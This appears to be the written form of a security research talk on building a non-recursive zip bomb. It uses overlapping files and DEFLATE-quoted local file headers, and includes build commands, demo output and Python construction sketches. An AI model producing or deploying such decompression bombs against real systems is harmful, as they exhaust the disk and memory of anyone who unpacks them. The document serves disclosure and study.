A better zip bomb

David Fifield <david@bamsoftware.com>

https://www.bamsoftware.com/hacks/zipbomb/ (writeup)

https://www.bamsoftware.com/hacks/denhac-zipbomb/ (this talk)

Source code / short demo

source code link

$ git clone https://www.bamsoftware.com/git/zipbomb.git
$ cd zipbomb
$ make
$ sha256sum zbsm.zip zblg.zip zbxl.zip
fb4ff972d21189beec11e05109c4354d0cd6d3b629263d6c950cf8cc3f78bd99  zbsm.zip
f1dc920869794df3e258f42f9b99157104cd3f8c14394c1b9d043d6fcda14c0a  zblg.zip
eafd8f574ea7fd0f345eaa19eae8d0d78d5323c8154592c850a2d78a86817744  zbxl.zip
$ wc --bytes zbsm.zip zblg.zip zbxl.zip
   42374 zbsm.zip
 9893525 zblg.zip
45876952 zbxl.zip
$ unzip -l zblg.zip | tail -n 1
281395456244934                     65534 files
$ ./ratio zblg.zip
zblg.zip	281395456244934 / 9893525	28442385.9286689	+74.54 dB
$ time unzip -p zblg.zip | dd bs=32M of=/dev/null status=progress
...
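
The figures printed by ./ratio above can be reproduced by hand. The following is a minimal sketch, not the tool's actual source: the function name ratio_report is hypothetical, and the assumption that the dB column is 10·log10 of the ratio is inferred only from the fact that it reproduces the printed value.

```python
import math

def ratio_report(unzipped_size, zipped_size):
    """Return (ratio, decibels) for total unzipped size over zipped size."""
    ratio = unzipped_size / zipped_size
    # Assumption: the dB column is 10*log10(ratio); this matches +74.54 dB.
    decibels = 10 * math.log10(ratio)
    return ratio, decibels

# Sizes taken from the unzip -l and wc --bytes output for zblg.zip.
ratio, decibels = ratio_report(281395456244934, 9893525)
print(f"{ratio:.2f}\t{decibels:+.2f} dB")
```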

Haven't I heard this before?

Screenshot of https://www.unforgettable.dk/.

Limits of the DEFLATE compression algorithm

The only universally supported compression algorithm is DEFLATE (RFC 1951).

But DEFLATE's maximum compression ratio is 1032:1.

$ dd if=/dev/zero bs=1000000 count=1000 | gzip > test.gz
$ gzip -l test.gz
         compressed        uncompressed  ratio uncompressed_name
             970501          1000000000  99.9% test
$ echo '1000000000 / 970501' | bc -l
1030.39564101428025318881
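
Where 1032 comes from: the longest match DEFLATE can encode is 258 bytes, and a match costs at least 2 bits (one for the length code, one for the distance code), so 258 × 8 / 2 = 1032. The sketch below checks that arithmetic and measures what zlib actually achieves on a run of zero bytes. The helper name raw_deflate and the 10 MB input size are arbitrary choices for illustration.

```python
import zlib

MAX_MATCH_BYTES = 258      # longest match length in DEFLATE (RFC 1951)
MIN_BITS_PER_MATCH = 2     # 1-bit length code + 1-bit distance code
theoretical_limit = MAX_MATCH_BYTES * 8 / MIN_BITS_PER_MATCH

def raw_deflate(data, level=9):
    """Compress to a raw DEFLATE stream (no zlib or gzip wrapper)."""
    c = zlib.compressobj(level, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()

unzipped = bytes(10_000_000)            # 10 MB of zero bytes
zipped = raw_deflate(unzipped)
measured = len(unzipped) / len(zipped)
print("theoretical limit:", theoretical_limit)
print("measured ratio:   ", measured)
```

The measured ratio stays a little below the limit because of block headers and Huffman table overhead.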

42.zip tries to work around the DEFLATE limitation by recursively nesting zip files inside other zip files.

Screenshot of xarchiver 0.5.4.14 open to the top layer of 42.zip.
Screenshot of xarchiver 0.5.4.14 open to the bottom layer of 42.zip.

Goal: high compression ratio without using recursion.

Zip format

A block diagram of the structure of a zip file. The central directory consists of three central directory headers labeled CDH[1] (README), CDH[2] (Makefile), and CDH[3] (demo.c). The central directory headers point backwards to three local file headers LFH[1] (README), LFH[2] (Makefile), and LFH[3] (demo.c). Each local file header is joined with file data. The three joined blocks of (local file header, file data) are labeled file 1, file 2, and file 3.

A zip file consists of a central directory, which is like a table of contents that points backwards to individual files.

Each file consists of a local file header and compressed file data.

The headers in the central directory and in the files contain (redundant) metadata such as the filename.
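
To make the layout concrete, here is a small sketch that builds an ordinary zip file in memory with Python's zipfile module and then walks it by hand: end of central directory record, then each central directory header, then the local file header it points back to. The function names are hypothetical, and the parser assumes no archive comment and no Zip64, which holds for this tiny example but not for zip files in general.

```python
import io
import struct
import zipfile

def build_example():
    """Return the bytes of a small, ordinary three-file zip."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name in ("README", "Makefile", "demo.c"):
            z.writestr(name, ("contents of " + name + "\n") * 10)
    return buf.getvalue()

def walk_central_directory(data):
    """Return a list of (CDH filename, LFH offset, LFH filename)."""
    # End of central directory record: the last 22 bytes when there is
    # no archive comment (an assumption of this sketch).
    eocd = struct.unpack("<I4H2IH", data[-22:])
    assert eocd[0] == 0x06054b50
    total_entries, cd_offset = eocd[4], eocd[6]
    entries = []
    pos = cd_offset
    for _ in range(total_entries):
        # Central directory header: 46 fixed bytes, then variable fields.
        cdh = struct.unpack("<I6H3I5H2I", data[pos:pos + 46])
        assert cdh[0] == 0x02014b50
        name_len, extra_len, comment_len = cdh[10], cdh[11], cdh[12]
        lfh_offset = cdh[16]
        cdh_name = data[pos + 46:pos + 46 + name_len]
        # Local file header: 30 fixed bytes, then the filename again.
        lfh = struct.unpack("<I5H3I2H", data[lfh_offset:lfh_offset + 30])
        assert lfh[0] == 0x04034b50
        lfh_name = data[lfh_offset + 30:lfh_offset + 30 + lfh[9]]
        entries.append((cdh_name, lfh_offset, lfh_name))
        pos += 46 + name_len + extra_len + comment_len
    return entries

for cdh_name, offset, lfh_name in walk_central_directory(build_example()):
    print(cdh_name, "-> offset", offset, "->", lfh_name)
```

Each filename appears twice, once in the central directory and once in the local file header, which is the redundancy the tricks below play with.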

The zip file format specification is called APPNOTE.TXT. For a specification, it's not very precise. If you read it with a security mindset, you will quickly think of many troubling questions.

Trick #1: overlapping files

A block diagram of a zip file with fully overlapping files. The central directory consists of central directory headers CDH[1], CDH[2], ..., CDH[N−1], CDH[N], with filenames A, B, ..., Y, Z. There is a single local file header LFH[1] with filename A whose file data is a compressed kernel. Every one of the central directory headers points backwards to the same local file header, LFH[1]. The lone file is multiply labeled file 1, file 2, ..., file N−1, file N.

Compress one kernel of ratio 1032:1, refer to it many times.

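Unfortunately this doesn't quite work: the single local file header carries only one filename, so it cannot match the different filenames in the central directory headers, and some zip parsers complain about the mismatch.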
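
The mismatch can be seen with a hand-built two-entry archive. This is an illustrative sketch, not the code that generates overlap.zip: every helper name is hypothetical, and fields such as the version and date are filled with arbitrary valid values. Python's zipfile module is used as the parser because it compares the two filenames and raises an exception when they differ; other parsers may only warn or may not check at all.

```python
import io
import struct
import zipfile
import zlib

def raw_deflate(data):
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()

def local_file_header(name, crc, csize, usize):
    # signature, version needed, flags, method 8 (DEFLATE), time, date
    return struct.pack("<I5H3I2H", 0x04034b50, 20, 0, 8, 0, 0x21,
                       crc, csize, usize, len(name), 0) + name

def central_directory_header(name, crc, csize, usize, lfh_offset):
    return struct.pack("<I6H3I5H2I", 0x02014b50, 20, 20, 0, 8, 0, 0x21,
                       crc, csize, usize, len(name), 0, 0, 0, 0, 0,
                       lfh_offset) + name

def end_of_central_directory(count, cd_size, cd_offset):
    return struct.pack("<I4H2IH", 0x06054b50, 0, 0, count, count,
                       cd_size, cd_offset, 0)

def overlapping_zip(names, kernel):
    """One local file (named names[0]); every CDH points at offset 0."""
    comp = raw_deflate(kernel)
    crc = zlib.crc32(kernel)
    body = local_file_header(names[0], crc, len(comp), len(kernel)) + comp
    cd = b"".join(
        central_directory_header(n, crc, len(comp), len(kernel), 0)
        for n in names)
    return body + cd + end_of_central_directory(len(names), len(cd), len(body))

archive = zipfile.ZipFile(io.BytesIO(overlapping_zip([b"A", b"B"], b"a" * 1000)))
print(archive.namelist())            # both names are listed
print(len(archive.read("A")))        # "A" matches its local file header
try:
    archive.read("B")                # "B" points at a header named "A"
except zipfile.BadZipFile as e:
    print("rejected:", e)
```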

(See overlap.zip, generated by the source code.)

Trick #2: quoting headers

A block diagram of a zip file with quoted local file headers. The central directory consists of central directory headers CDH[1], CDH[2], ..., CDH[N−1], CDH[N], with filenames A, B, ..., Y, Z. The central directory headers point to corresponding local file headers LFH[1], LFH[2], ..., LFH[N−1], LFH[N] with filenames A, B, ..., Y, Z. The files are drawn and labeled to show that file 1 does not end before file 2 begins; rather file 1 contains file 2, file 2 contains file 3, and so on. There is a small green-colored space between LFH[1] and LFH[2], and between LFH[2] and LFH[3], etc., to stand for quoting the following local file header using an uncompressed DEFLATE block. The file data of the final file, whose local file header is LFH[N] and whose filename is Z, does not contain any other files, only the compressed kernel.

We need separate local file headers, but we cannot just put them end to end, because the decompressor is expecting a structured DEFLATE stream, not another local file header.

We need a way to protect or quote the local file headers to prevent them from being interpreted as DEFLATE data.

Solution: add a prefix that wraps the local file header in a non-compressed literal block, thus making it a valid part of the DEFLATE stream.

3.2.3. Details of block format

Each block of compressed data begins with 3 header bits
containing the following data:

   first bit       BFINAL
   next 2 bits     BTYPE

BFINAL is set if and only if this is the last block of the data
set.

BTYPE specifies how the data are compressed, as follows:

   00 - no compression
   01 - compressed with fixed Huffman codes
   10 - compressed with dynamic Huffman codes
   11 - reserved (error)

3.2.4. Non-compressed blocks (BTYPE=00)

Any bits of input up to the next byte boundary are ignored.
The rest of the block consists of the following information:

     0   1   2   3   4...
   +---+---+---+---+================================+
   |  LEN  | NLEN  |... LEN bytes of literal data...|
   +---+---+---+---+================================+

LEN is the number of data bytes in the block.  NLEN is the
one's complement of LEN.
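
Putting the two RFC excerpts together, quoting a local file header takes five bytes: one byte holding BFINAL=0 and BTYPE=00 (the remaining bits are padding up to the byte boundary), then LEN and NLEN as little-endian 16-bit values. The sketch below is one way to write that. The function names are hypothetical, and the 31-byte fake_header is a stand-in, not a real local file header.

```python
import struct
import zlib

def quote(data):
    """Wrap data in a non-final, non-compressed DEFLATE block."""
    assert len(data) <= 0xFFFF            # LEN is a 16-bit field
    block_header = b"\x00"                # BFINAL=0, BTYPE=00, then padding
    length = struct.pack("<HH", len(data), len(data) ^ 0xFFFF)  # LEN, NLEN
    return block_header + length + data

def raw_deflate(data):
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()

# Stand-in for a 31-byte local file header (30 fixed bytes + 1-byte name).
fake_header = b"PK\x03\x04" + bytes(26) + b"E"
kernel = b"a" * 36121

# A quoted header followed by a compressed kernel is one valid stream.
stream = quote(fake_header) + raw_deflate(kernel)
output = zlib.decompress(stream, -15)
print(output[:4], len(output))
```

The decompressor emits the header bytes verbatim and then carries on into the kernel, so the header becomes part of the file's contents.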

Quoting demonstrated

$ ./zipbomb --alphabet=ABCDE --num-files=5 --compressed-size=50 > test.zip
$ unzip -l test.zip
Archive:  test.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
    36245  1982-10-08 13:37   A
    36214  1982-10-08 13:37   B
    36183  1982-10-08 13:37   C
    36152  1982-10-08 13:37   D
    36121  1982-10-08 13:37   E
---------                     -------
   180915                     5 files
The DEFLATE stream of each file:

A:
BFINAL=0 BTYPE=00 31 bytes "PK\x03\x04\x14\x00..."
BFINAL=0 BTYPE=00 31 bytes "PK\x03\x04\x14\x00..."
BFINAL=0 BTYPE=00 31 bytes "PK\x03\x04\x14\x00..."
BFINAL=0 BTYPE=00 31 bytes "PK\x03\x04\x14\x00..."
BFINAL=1 BTYPE=10 compressed kernel 36121 × 'a'

B:
BFINAL=0 BTYPE=00 31 bytes "PK\x03\x04\x14\x00..."
BFINAL=0 BTYPE=00 31 bytes "PK\x03\x04\x14\x00..."
BFINAL=0 BTYPE=00 31 bytes "PK\x03\x04\x14\x00..."
BFINAL=1 BTYPE=10 compressed kernel 36121 × 'a'

C:
BFINAL=0 BTYPE=00 31 bytes "PK\x03\x04\x14\x00..."
BFINAL=0 BTYPE=00 31 bytes "PK\x03\x04\x14\x00..."
BFINAL=1 BTYPE=10 compressed kernel 36121 × 'a'

D:
BFINAL=0 BTYPE=00 31 bytes "PK\x03\x04\x14\x00..."
BFINAL=1 BTYPE=10 compressed kernel 36121 × 'a'

E:
BFINAL=1 BTYPE=10 compressed kernel 36121 × 'a'

Local file headers are treated as both code and data: as part of the zip structure (code) and as part of a DEFLATE stream (file data).
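
The lengths in the unzip -l listing follow directly from this structure: each file's output is the 36121-byte kernel plus one 31-byte local file header (30 fixed bytes and a 1-byte filename) for every file that comes after it. A quick check of that arithmetic, with a hypothetical helper name:

```python
KERNEL_SIZE = 36121   # uncompressed size of the kernel, from the listing
HEADER_SIZE = 31      # 30-byte fixed local file header + 1-byte filename

def listed_sizes(names, kernel_size, header_size):
    """Uncompressed size of each file: kernel plus all later quoted headers."""
    n = len(names)
    return {name: kernel_size + header_size * (n - 1 - i)
            for i, name in enumerate(names)}

sizes = listed_sizes("ABCDE", KERNEL_SIZE, HEADER_SIZE)
for name, size in sizes.items():
    print(name, size)
print("total", sum(sizes.values()))
```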

$ unzip test.zip
Archive:  test.zip
  inflating: A
  inflating: B
  inflating: C
  inflating: D
  inflating: E
$ xxd E | head -n 5
00000000: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000010: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000020: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000030: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000040: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
$ xxd D | head -n 5
00000000: 504b 0304 1400 0000 0800 a06c 4805 a1b7  PK.........lH...
00000010: f363 3200 0000 198d 0000 0100 0000 4561  .c2...........Ea
00000020: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000030: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000040: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
$ xxd C | head -n 5
00000000: 504b 0304 1400 0000 0800 a06c 4805 29b0  PK.........lH.).
00000010: 790b 5600 0000 388d 0000 0100 0000 4450  y.V...8.......DP
00000020: 4b03 0414 0000 0008 00a0 6c48 05a1 b7f3  K.........lH....
00000030: 6332 0000 0019 8d00 0001 0000 0045 6161  c2...........Eaa
00000040: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa

Discussion topics

In order of increasing technicality.

Optimization

Log–log plot of unzipped size versus zipped size for different zip file constructions: DEFLATE, bzip2, quoted DEFLATE, and 42.zip (recursive and non-recursive).

Effects

CVE-2019-13232

Info-ZIP UnZip 6.0 mishandles the overlapping of files inside a ZIP container, leading to denial of service (resource consumption), aka a "better zip bomb" issue.

IMO this is not really a security problem with UnZip.

Debian merged a patch; SUSE decided not to. The Debian patch caused unanticipated problems with certain zip-like files:

Effects (antivirus)

VirusTotal for:

Selected web server referers:

Effects

Screenshot of a twitter "unsafe link" page referring to the zip bomb article.
Screenshot of https://www.bamsoftware.com/ showing a Safe Browsing interstitial.

Other ideas?

PDF is similar structurally to zip. Didier Stevens wrote about stacking compression filters to create a PDF bomb.
